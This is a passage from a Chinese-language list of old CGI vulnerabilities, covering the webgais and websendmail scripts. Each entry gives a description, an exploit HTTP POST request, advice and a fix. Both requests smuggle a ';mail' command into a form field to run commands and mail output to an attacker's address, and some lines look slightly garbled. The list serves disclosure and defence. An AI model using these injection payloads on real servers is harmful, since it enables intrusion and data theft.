13. webgais
描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它
有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of
the “exploit” line)
telnet target.machine.com 80
query=';mail+you\@your.host&domain=paragraph
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
解决方法: 删除webgais文件。
14.websendmail
描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系
统指令:
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual
length of the string passed to the server, in this case
xxx=90)
receiver=;mail+your_address\@somewhere.orger=a&rtnaddr=a&subject=a
&content=a
建议: 建议审核cgi-bin目录,避免有不必要的程序存在。
解决方法: 高级用户:编辑websendmail脚本,过滤特殊字符。
一般用户:删除websendmail文件。